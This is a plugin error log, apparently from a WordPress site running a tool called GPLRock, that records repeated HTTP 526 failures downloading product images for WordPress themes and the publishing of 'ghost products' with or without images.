Code: 526, Error: . Retrying... [07-Apr-2026 10:10:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/optico--optometrist--eye-care-wordpress-theme-10861.webp for product optico-optometrist-eye-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:10:22 UTC] GPLRock: Image download failed for product optico-optometrist-eye-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:24 UTC] GPLRock: Image download failed for product optico-optometrist-eye-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/optico--optometrist--eye-care-wordpress-theme-10861.webp for product optico-optometrist-eye-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:10:26 UTC] GPLRock WARNING: Image download failed for product optico-optometrist-eye-care-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/optico--optometrist--eye-care-wordpress-theme-10861.webp [07-Apr-2026 10:10:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: optico-optometrist-eye-care-wordpress-theme [07-Apr-2026 10:10:26 UTC] GPLRock: Image download failed for product poize-wordpress-theme-for-music-events-festivals-venues (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:29 UTC] GPLRock: Image download failed for product poize-wordpress-theme-for-music-events-festivals-venues (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/poize---wordpress-theme-for-music-events-festivals--venues-20643.webp for product poize-wordpress-theme-for-music-events-festivals-venues after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:10:31 UTC] GPLRock: Image download failed for product poize-wordpress-theme-for-music-events-festivals-venues (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:33 UTC] GPLRock: Image download failed for product poize-wordpress-theme-for-music-events-festivals-venues (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/poize---wordpress-theme-for-music-events-festivals--venues-20643.webp for product poize-wordpress-theme-for-music-events-festivals-venues after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:10:35 UTC] GPLRock WARNING: Image download failed for product poize-wordpress-theme-for-music-events-festivals-venues. URL: https://meldwp.com/wp-content/uploads/poize---wordpress-theme-for-music-events-festivals--venues-20643.webp [07-Apr-2026 10:10:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: poize-wordpress-theme-for-music-events-festivals-venues [07-Apr-2026 10:10:35 UTC] GPLRock: Image download failed for product moro-multi-purpose-magazine-theme-with-portfolio (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:37 UTC] GPLRock: Image download failed for product moro-multi-purpose-magazine-theme-with-portfolio (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moro---multi-purpose-magazine-theme-with-portfolio-15481.webp for product moro-multi-purpose-magazine-theme-with-portfolio after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:10:39 UTC] GPLRock: Image download failed for product moro-multi-purpose-magazine-theme-with-portfolio (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:42 UTC] GPLRock: Image download failed for product moro-multi-purpose-magazine-theme-with-portfolio (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moro---multi-purpose-magazine-theme-with-portfolio-15481.webp for product moro-multi-purpose-magazine-theme-with-portfolio after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:10:44 UTC] GPLRock WARNING: Image download failed for product moro-multi-purpose-magazine-theme-with-portfolio. URL: https://meldwp.com/wp-content/uploads/moro---multi-purpose-magazine-theme-with-portfolio-15481.webp [07-Apr-2026 10:10:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: moro-multi-purpose-magazine-theme-with-portfolio [07-Apr-2026 10:10:44 UTC] GPLRock: Image download failed for product grano-organic-food-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:46 UTC] GPLRock: Image download failed for product grano-organic-food-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grano---organic--food-wordpress-theme-8142.webp for product grano-organic-food-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:10:48 UTC] GPLRock: Image download failed for product grano-organic-food-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:50 UTC] GPLRock: Image download failed for product grano-organic-food-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grano---organic--food-wordpress-theme-8142.webp for product grano-organic-food-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:10:52 UTC] GPLRock WARNING: Image download failed for product grano-organic-food-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/grano---organic--food-wordpress-theme-8142.webp [07-Apr-2026 10:10:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: grano-organic-food-wordpress-theme [07-Apr-2026 10:10:52 UTC] GPLRock: Image download failed for product enginir-industrial-engineering-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:55 UTC] GPLRock: Image download failed for product enginir-industrial-engineering-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/enginir---industrial--engineering-multipurpose-wordpress-theme-5592.webp for product enginir-industrial-engineering-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:10:57 UTC] GPLRock: Image download failed for product enginir-industrial-engineering-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:59 UTC] GPLRock: Image download failed for product enginir-industrial-engineering-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:11:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/enginir---industrial--engineering-multipurpose-wordpress-theme-5592.webp for product enginir-industrial-engineering-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:11:01 UTC] GPLRock WARNING: Image download failed for product enginir-industrial-engineering-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/enginir---industrial--engineering-multipurpose-wordpress-theme-5592.webp [07-Apr-2026 10:11:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: enginir-industrial-engineering-multipurpose-wordpress-theme [07-Apr-2026 10:11:01 UTC] GPLRock: Image download failed for product exopress-multipurpose-personal-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:11:03 UTC] GPLRock: Image download failed for product exopress-multipurpose-personal-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:11:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/exopress--multipurpose-personal-blog-wordpress-theme-17818.webp for product exopress-multipurpose-personal-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:11:05 UTC] GPLRock: Image download failed for product exopress-multipurpose-personal-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:11:07 UTC] GPLRock: Image download failed for product exopress-multipurpose-personal-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:11:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/exopress--multipurpose-personal-blog-wordpress-theme-17818.webp for product exopress-multipurpose-personal-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:11:10 UTC] GPLRock WARNING: Image download failed for product exopress-multipurpose-personal-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/exopress--multipurpose-personal-blog-wordpress-theme-17818.webp [07-Apr-2026 10:11:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: exopress-multipurpose-personal-blog-wordpress-theme [07-Apr-2026 10:11:10 UTC] GPLRock: Image download failed for product numrique-seo-digital-marketing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:11:12 UTC] GPLRock: Image download failed for product numrique-seo-digital-marketing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:11:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/numrique---seo-digital-marketing-wordpress-theme-11745.webp for product numrique-seo-digital-marketing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:11:14 UTC] GPLRock: Image download failed for product numrique-seo-digital-marketing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:11:16 UTC] GPLRock: Image download failed for product numrique-seo-digital-marketing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:11:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/numrique---seo-digital-marketing-wordpress-theme-11745.webp for product numrique-seo-digital-marketing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:11:18 UTC] GPLRock WARNING: Image download failed for product numrique-seo-digital-marketing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/numrique---seo-digital-marketing-wordpress-theme-11745.webp [07-Apr-2026 10:11:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: numrique-seo-digital-marketing-wordpress-theme [07-Apr-2026 10:11:18 UTC] GPLRock: Image downloaded successfully for product malo-beekeeping-honey-shop-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2ab49b6c.webp [07-Apr-2026 10:11:18 UTC] GPLRock: Using pre-downloaded image for product malo-beekeeping-honey-shop-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2ab49b6c.webp [07-Apr-2026 10:11:18 UTC] GPLRock: Ghost product published with image - Product ID: malo-beekeeping-honey-shop-wordpress-theme [07-Apr-2026 10:11:47 UTC] GPLRock: Image download failed for product sns-nova-digital-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:11:49 UTC] GPLRock: Image download failed for product sns-nova-digital-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:11:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sns-nova---digital-store-wordpress-theme-1196.webp for product sns-nova-digital-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:11:52 UTC] GPLRock: Image download failed for product sns-nova-digital-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:11:54 UTC] GPLRock: Image download failed for product sns-nova-digital-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:11:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sns-nova---digital-store-wordpress-theme-1196.webp for product sns-nova-digital-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:11:56 UTC] GPLRock WARNING: Image download failed for product sns-nova-digital-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sns-nova---digital-store-wordpress-theme-1196.webp [07-Apr-2026 10:11:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sns-nova-digital-store-wordpress-theme [07-Apr-2026 10:11:56 UTC] GPLRock: Image download failed for product napapp-wordpress-app-landing-page (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:11:58 UTC] GPLRock: Image download failed for product napapp-wordpress-app-landing-page (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/napapp---wordpress-app-landing-page-2060.webp for product napapp-wordpress-app-landing-page after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:12:00 UTC] GPLRock: Image download failed for product napapp-wordpress-app-landing-page (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:02 UTC] GPLRock: Image download failed for product napapp-wordpress-app-landing-page (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/napapp---wordpress-app-landing-page-2060.webp for product napapp-wordpress-app-landing-page after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:12:05 UTC] GPLRock WARNING: Image download failed for product napapp-wordpress-app-landing-page. URL: https://meldwp.com/wp-content/uploads/napapp---wordpress-app-landing-page-2060.webp [07-Apr-2026 10:12:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: napapp-wordpress-app-landing-page [07-Apr-2026 10:12:05 UTC] GPLRock: Image download failed for product landmaster-garden-landscaping-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:07 UTC] GPLRock: Image download failed for product landmaster-garden-landscaping-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/landmaster---garden--landscaping-wordpress-theme-18004.webp for product landmaster-garden-landscaping-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:12:09 UTC] GPLRock: Image download failed for product landmaster-garden-landscaping-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:11 UTC] GPLRock: Image download failed for product landmaster-garden-landscaping-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/landmaster---garden--landscaping-wordpress-theme-18004.webp for product landmaster-garden-landscaping-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:12:13 UTC] GPLRock WARNING: Image download failed for product landmaster-garden-landscaping-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/landmaster---garden--landscaping-wordpress-theme-18004.webp [07-Apr-2026 10:12:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: landmaster-garden-landscaping-wordpress-theme [07-Apr-2026 10:12:13 UTC] GPLRock: Image download failed for product waterly-drinking-water-delivery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:15 UTC] GPLRock: Image download failed for product waterly-drinking-water-delivery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/waterly---drinking-water-delivery-wordpress-theme-21541.webp for product waterly-drinking-water-delivery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:12:18 UTC] GPLRock: Image download failed for product waterly-drinking-water-delivery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:20 UTC] GPLRock: Image download failed for product waterly-drinking-water-delivery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/waterly---drinking-water-delivery-wordpress-theme-21541.webp for product waterly-drinking-water-delivery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:12:22 UTC] GPLRock WARNING: Image download failed for product waterly-drinking-water-delivery-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/waterly---drinking-water-delivery-wordpress-theme-21541.webp [07-Apr-2026 10:12:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: waterly-drinking-water-delivery-wordpress-theme [07-Apr-2026 10:12:22 UTC] GPLRock: Image download failed for product cyberstore-simple-ecommerce-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:24 UTC] GPLRock: Image download failed for product cyberstore-simple-ecommerce-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cyberstore---simple-ecommerce-shop-wordpress-theme-5912.webp for product cyberstore-simple-ecommerce-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:12:26 UTC] GPLRock: Image download failed for product cyberstore-simple-ecommerce-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:28 UTC] GPLRock: Image download failed for product cyberstore-simple-ecommerce-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cyberstore---simple-ecommerce-shop-wordpress-theme-5912.webp for product cyberstore-simple-ecommerce-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:12:30 UTC] GPLRock WARNING: Image download failed for product cyberstore-simple-ecommerce-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cyberstore---simple-ecommerce-shop-wordpress-theme-5912.webp [07-Apr-2026 10:12:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cyberstore-simple-ecommerce-shop-wordpress-theme [07-Apr-2026 10:12:31 UTC] GPLRock: Image download failed for product woxa-responsive-wordpress-theme-for-blogsmini-magazines (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:33 UTC] GPLRock: Image download failed for product woxa-responsive-wordpress-theme-for-blogsmini-magazines (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woxa---responsive-wordpress-theme-for-blogsmini-magazines-2742.webp for product woxa-responsive-wordpress-theme-for-blogsmini-magazines after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:12:35 UTC] GPLRock: Image download failed for product woxa-responsive-wordpress-theme-for-blogsmini-magazines (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:37 UTC] GPLRock: Image download failed for product woxa-responsive-wordpress-theme-for-blogsmini-magazines (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woxa---responsive-wordpress-theme-for-blogsmini-magazines-2742.webp for product woxa-responsive-wordpress-theme-for-blogsmini-magazines after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:12:39 UTC] GPLRock WARNING: Image download failed for product woxa-responsive-wordpress-theme-for-blogsmini-magazines. URL: https://meldwp.com/wp-content/uploads/woxa---responsive-wordpress-theme-for-blogsmini-magazines-2742.webp [07-Apr-2026 10:12:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woxa-responsive-wordpress-theme-for-blogsmini-magazines [07-Apr-2026 10:12:39 UTC] GPLRock: Image download failed for product utouch-multi-purpose-business-and-digital-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:42 UTC] GPLRock: Image download failed for product utouch-multi-purpose-business-and-digital-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/utouch---multi-purpose-business-and-digital-technology-wordpress-theme-17732.webp for product utouch-multi-purpose-business-and-digital-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:12:44 UTC] GPLRock: Image download failed for product utouch-multi-purpose-business-and-digital-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:46 UTC] GPLRock: Image download failed for product utouch-multi-purpose-business-and-digital-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/utouch---multi-purpose-business-and-digital-technology-wordpress-theme-17732.webp for product utouch-multi-purpose-business-and-digital-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:12:48 UTC] GPLRock WARNING: Image download failed for product utouch-multi-purpose-business-and-digital-technology-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/utouch---multi-purpose-business-and-digital-technology-wordpress-theme-17732.webp [07-Apr-2026 10:12:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: utouch-multi-purpose-business-and-digital-technology-wordpress-theme [07-Apr-2026 10:12:48 UTC] GPLRock: Image download failed for product antique-responsive-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:50 UTC] GPLRock: Image download failed for product antique-responsive-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/antique---responsive-personal-portfolio-wordpress-theme-19301.webp for product antique-responsive-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:12:52 UTC] GPLRock: Image download failed for product antique-responsive-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:54 UTC] GPLRock: Image download failed for product antique-responsive-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/antique---responsive-personal-portfolio-wordpress-theme-19301.webp for product antique-responsive-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:12:57 UTC] GPLRock WARNING: Image download failed for product antique-responsive-personal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/antique---responsive-personal-portfolio-wordpress-theme-19301.webp [07-Apr-2026 10:12:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: antique-responsive-personal-portfolio-wordpress-theme [07-Apr-2026 10:12:57 UTC] GPLRock: Image download failed for product druk-printing-service-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:12:59 UTC] GPLRock: Image download failed for product druk-printing-service-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:13:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/druk---printing-service-wordpress-theme-26098.webp for product druk-printing-service-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:13:01 UTC] GPLRock: Image download failed for product druk-printing-service-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:13:03 UTC] GPLRock: Image download failed for product druk-printing-service-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:13:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/druk---printing-service-wordpress-theme-26098.webp for product druk-printing-service-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:13:05 UTC] GPLRock WARNING: Image download failed for product druk-printing-service-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/druk---printing-service-wordpress-theme-26098.webp [07-Apr-2026 10:13:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: druk-printing-service-wordpress-theme [07-Apr-2026 10:13:05 UTC] GPLRock: Image download failed for product kilio-sport-shop-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:13:07 UTC] GPLRock: Image download failed for product kilio-sport-shop-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:13:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kilio---sport-shop-woocommerce-wordpress-theme-13263.webp for product kilio-sport-shop-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:13:10 UTC] GPLRock: Image download failed for product kilio-sport-shop-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:13:12 UTC] GPLRock: Image download failed for product kilio-sport-shop-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:13:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kilio---sport-shop-woocommerce-wordpress-theme-13263.webp for product kilio-sport-shop-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:13:14 UTC] GPLRock WARNING: Image download failed for product kilio-sport-shop-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kilio---sport-shop-woocommerce-wordpress-theme-13263.webp [07-Apr-2026 10:13:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kilio-sport-shop-woocommerce-wordpress-theme [07-Apr-2026 10:13:47 UTC] GPLRock: Image downloaded successfully for product modern-events-calendar (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-99b97c07.jpg [07-Apr-2026 10:13:47 UTC] GPLRock: Using pre-downloaded image for product modern-events-calendar: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-99b97c07.jpg [07-Apr-2026 10:13:47 UTC] GPLRock: Ghost product published with image - Product ID: modern-events-calendar [07-Apr-2026 10:13:48 UTC] GPLRock: Image downloaded successfully for product permalink-manager-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-20b5d782.jpg [07-Apr-2026 10:13:48 UTC] GPLRock: Using pre-downloaded image for product permalink-manager-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-20b5d782.jpg [07-Apr-2026 10:13:48 UTC] GPLRock: Ghost product published with image - Product ID: permalink-manager-pro [07-Apr-2026 10:13:50 UTC] GPLRock: Image downloaded successfully for product osmosis-responsive-multi-purpose-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3ef4227b.jpg [07-Apr-2026 10:13:50 UTC] GPLRock: Using pre-downloaded image for product osmosis-responsive-multi-purpose-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3ef4227b.jpg [07-Apr-2026 10:13:50 UTC] GPLRock: Ghost product published with image - Product ID: osmosis-responsive-multi-purpose-theme [07-Apr-2026 10:13:51 UTC] GPLRock: Image downloaded successfully for product wp-domain-checker (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9d47698d.jpg [07-Apr-2026 10:13:51 UTC] GPLRock: Using pre-downloaded image for product wp-domain-checker: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9d47698d.jpg [07-Apr-2026 10:13:51 UTC] GPLRock: Ghost product published with image - Product ID: wp-domain-checker [07-Apr-2026 10:13:53 UTC] GPLRock: Image downloaded successfully for product woocommerce-cart-woocart-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3745f86d.jpg [07-Apr-2026 10:13:53 UTC] GPLRock: Using pre-downloaded image for product woocommerce-cart-woocart-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3745f86d.jpg [07-Apr-2026 10:13:53 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-cart-woocart-pro [07-Apr-2026 10:13:54 UTC] GPLRock: Image downloaded successfully for product booked-appointment-booking-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ef746167.jpg [07-Apr-2026 10:13:55 UTC] GPLRock: Using pre-downloaded image for product booked-appointment-booking-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ef746167.jpg [07-Apr-2026 10:13:55 UTC] GPLRock: Ghost product published with image - Product ID: booked-appointment-booking-for-wordpress [07-Apr-2026 10:13:56 UTC] GPLRock: Image downloaded successfully for product ait-comments-extension (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d52dfb4a.jpg [07-Apr-2026 10:13:56 UTC] GPLRock: Using pre-downloaded image for product ait-comments-extension: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d52dfb4a.jpg [07-Apr-2026 10:13:56 UTC] GPLRock: Ghost product published with image - Product ID: ait-comments-extension [07-Apr-2026 10:13:57 UTC] GPLRock: Image downloaded successfully for product ait-claim-listing (attempt 1) to: 